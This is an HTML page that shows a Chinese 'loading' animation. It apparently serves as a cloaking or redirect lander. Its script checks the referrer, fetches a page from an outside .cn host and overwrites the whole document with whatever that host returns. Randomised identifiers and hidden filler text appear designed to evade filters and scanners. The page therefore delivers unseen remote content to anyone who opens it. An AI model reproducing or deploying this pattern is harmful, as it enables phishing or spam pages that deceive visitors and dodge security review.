<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .F94w5d {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .F94w5d .kmzyvB {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .F94w5d .content {
            line-height: 50px;
            text-align: center
        }

        .F94w5d .img {
            width: 100%
        }

        .F94w5d .yZQYDC {
            text-align: center
        }

        .F94w5d .yZQYDC span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .F94w5d .yZQYDC span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .F94w5d .yZQYDC span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .F94w5d .yZQYDC span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .F94w5d .yZQYDC span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .F94w5d .yZQYDC span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .F94w5d .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function rHzsq6sxwVVy(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var UmpnuG = rHzsq6sxwVVy('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ UmpnuG +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ UmpnuG +".html?a=share";
		}
		
        WCaJocZUT=url+"#"+new Date().getTime();
        WCaJocZUT && function() {
            $.get(WCaJocZUT, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>y4EENWctb25knA4sc0NqPGrgKoxekhNzRjwb47wQsndZOavfHuVCQpnwCvN8PQMuha8BWg2dsvNcphDy8</a>
<h1 style='display:none' >l5U8LuQYx0aeVcpSt</h1>
<p  style='display:none'>eLFlgNMLYx5F9cuh9GFTuL33kA0h3DInQOFeyJ8g</p><div class="F94w5d">
    <div class="kmzyvB">
        <div class="yZQYDC">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>jyQpP2y9CnapSFHI36GtGkM1PivvK8kvBnO4agcji43ZVpdyV5eJsLnbgDppyBXQj2IE5R8</div>
<div style='display:none'>jyQpP2y9CnapSFHI36GtGkM1PivvK8kvBnO4agcji43ZVpdyV5eJsLnbgDppyBXQj2IE5R8</div>
<img  src='' style='display:none'>
<h1 style='display:none' >jgnv0uh5QY18k</h1>
<div style='display:none'>jyQpP2y9CnapSFHI36GtGkM1PivvK8kvBnO4agcji43ZVpdyV5eJsLnbgDppyBXQj2IE5R8</div></body>
</html>